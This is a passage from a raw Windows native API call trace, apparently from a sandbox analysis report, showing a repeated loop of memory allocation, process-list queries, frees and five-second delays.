RegionSize=0xdea54*=0x20000) returned 0x0 [0232.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.594] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.753] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.760] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.768] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.824] 